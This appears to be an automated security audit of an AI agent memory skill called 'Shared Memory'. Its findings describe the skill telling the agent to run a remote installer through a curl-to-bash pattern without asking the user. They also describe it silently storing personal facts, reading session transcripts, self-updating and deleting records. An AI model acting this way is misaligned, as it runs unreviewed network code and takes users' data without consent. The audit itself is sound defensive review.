Security audit

Shared Memory

Security checks across malware telemetry and agentic risk

Overview

This is a real local memory skill, but it gives the agent broad authority to install code, read session transcripts, and silently store personal facts with insufficient user control.

Review this carefully before installing. Only install if you are comfortable with a memory system that can run a remote installer, read local agent session logs, store personal facts durably, and inject retrieved memories into future prompts sent to your configured LLM. Prefer manual CLI installation, disable or limit auto-recall if available, avoid storing secrets or sensitive personal data, and periodically review/delete memory rows in the local browser.

SkillSpector

By NVIDIA

Vulnerability Patterns

Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Rogue AgentSelf-Modification, Session Persistence
Trigger AbuseOverly Broad Trigger, Shadow Command Trigger, Keyword Baiting Trigger

Findings (15)

Description-Behavior Mismatch

Medium

Confidence: 95% confidence
Finding: The skill is presented as a memory wrapper, but it instructs the agent to automatically fetch and execute a remote installer via `curl | bash`-style process substitution without prior user confirmation. That expands the trust boundary from local CLI usage to arbitrary network-retrieved code execution, creating a supply-chain and remote code execution risk if the URL, repository, or transport is compromised.

Context-Inappropriate Capability

High

Confidence: 97% confidence
Finding: The skill embeds software installation and update behavior unrelated to the narrow task of memory management, including executing a remote installer and later downloading release artifacts. Even if hashes are checked, instructing an agent to self-bootstrap tooling from the network increases attack surface and can be abused for supply-chain compromise or unauthorized code execution on the host.

Context-Inappropriate Capability

Medium

Confidence: 93% confidence
Finding: The script intentionally extracts and emits `[SESSION_CWD]` from session logs, which can reveal sensitive local path information such as usernames, repository names, client names, or internal project structure. In a durable-memory skill whose stated purpose is to retain facts about the user rather than operational session metadata, this expands collection scope and creates unnecessary privacy leakage that could be persisted or re-used later.

Vague Triggers

Medium

Confidence: 87% confidence
Finding: The README explicitly states that a UserPromptSubmit hook performs semantic search and injects stored memories on every prompt, with no described scoping, consent gate, or contextual restrictions. In a cross-host memory system, this can cause unnecessary disclosure of sensitive stored facts into unrelated prompts or to third-party LLM backends, making the broad automatic trigger a genuine privacy and prompt-scope vulnerability.

Missing User Warnings

Medium

Confidence: 92% confidence
Finding: The README acknowledges that retrieved facts enter the agent's prompt context and reach the configured LLM, but it does not present this as a prominent privacy warning near the auto-recall feature or quick-start flow. Because this skill is designed to store durable user facts and automatically surface them, insufficient warning materially increases the risk of users unknowingly exposing personal, behavioral, or organizational data.

Vague Triggers

Medium

Confidence: 88% confidence
Finding: The skill's broad default activation means almost any non-dream user message can trigger memory behavior, increasing the chance of unintended searches, writes, or data processing without clear invocation boundaries. In a persistent-memory skill handling personal data, ambiguous triggering raises privacy and consent risks and makes prompt-injection or accidental activation more likely.

Missing User Warnings

High

Confidence: 98% confidence
Finding: The instructions explicitly tell the agent to run installation commands itself and not ask the user before downloading and executing code from the network. Autonomous shell execution of remote code is highly dangerous because it bypasses user review and can directly compromise the local system if the script source or dependency chain is malicious or tampered with.

Missing User Warnings

Medium

Confidence: 94% confidence
Finding: The skill directs silent auto-saving of sensitive personal information such as relationships, location, timezone, identity, and preferences into durable memory without confirmation. This weakens informed consent, increases privacy risk, and can cause persistent retention of data the user did not realize would be stored across sessions and hosts.

Missing User Warnings

Medium

Confidence: 93% confidence
Finding: The design explicitly authorizes scanning host session transcript files from Claude Code, Codex, and OpenClaw, which can contain highly sensitive prompts, outputs, credentials, proprietary code, and personal data. Although the document mentions secret filtering, it provides no clear user-facing consent, warning, or visibility mechanism for this privacy-sensitive log access, creating a real risk of unexpected collection and persistence of sensitive session content.

Missing User Warnings

Medium

Confidence: 88% confidence
Finding: The optional SessionStart recall hook performs automatic background retrieval and injects memory into the session without requiring an explicit user action at recall time. Even if token-budgeted, this can surface sensitive historical data unexpectedly into new contexts, increasing privacy leakage and the chance that stale or confidential memory is exposed to the model or copied into outputs.

Missing User Warnings

Medium

Confidence: 88% confidence
Finding: The skill instructs the agent to scan historic host transcripts and persist derived memory/state without requiring an explicit user-facing privacy notice or confirmation at execution time. Because transcripts can contain sensitive personal or contextual information even after filtering, silently ingesting and retaining them increases the risk of over-collection, unexpected retention, and privacy harm.

Missing User Warnings

Medium

Confidence: 90% confidence
Finding: The workflow performs destructive deletion of episodic rows via eviction and delete commands, but the instructions do not require a clear warning to the user that data may be permanently removed. This creates a real integrity and availability risk for stored memory because an agent following the skill can erase records during cleanup with no explicit acknowledgment from the user.

Ssd 3

Medium

Confidence: 96% confidence
Finding: The skill encourages broad collection and durable retention of personal information, including relationship data, location, timezone, identity, and goals, with cross-host persistence and minimal confirmation. In context, this is more dangerous because the skill is specifically designed to centralize long-lived user biography across environments, magnifying privacy harm from overcollection, misclassification, or compromise of the backing store.

Self-Modification

High

Category: Rogue Agent
Content: - **Typed facts.** `fact`, `preference`, `decision`, `learned`, plus trajectory-level `tried`, `fixed`, `built`. Searches and filters operate on these tags. - **Forgetting is first-class.** Delete by id, forget by filter — refuses empty filters as a guardrail. - **Local-first storage.** The memory store is on disk in `~/.linggen/memory/` (LanceDB) — no cloud sync, no telemetry. Retrieved facts do enter your agent's prompt context on each turn, so they reach whichever LLM you've configured. - **Self-updating.** `ling-mem upgrade --check` reports the latest release; `--yes` swaps the binary atomically. (`self-update` still works as an alias.) ## Quick start
Confidence: 78% confidence
Finding: self-update

Session Persistence

Medium

Category: Rogue Agent
Content: # Extractor prompt — host-LLM judge + write This file is the host LLM's working prompt for **Phase 2** of `/shared-memory dream`. The `scan` action already produced a clean,
Confidence: 87% confidence
Finding: write This file is the host LLM's working prompt for **Phase 2** of `/shared-memory dream`. The `scan` action already produced a clean, secret-filtered, byte-capped transcript per session and wrote t

VirusTotal

VirusTotal engine telemetry is currently stale for this artifact.

View on VirusTotal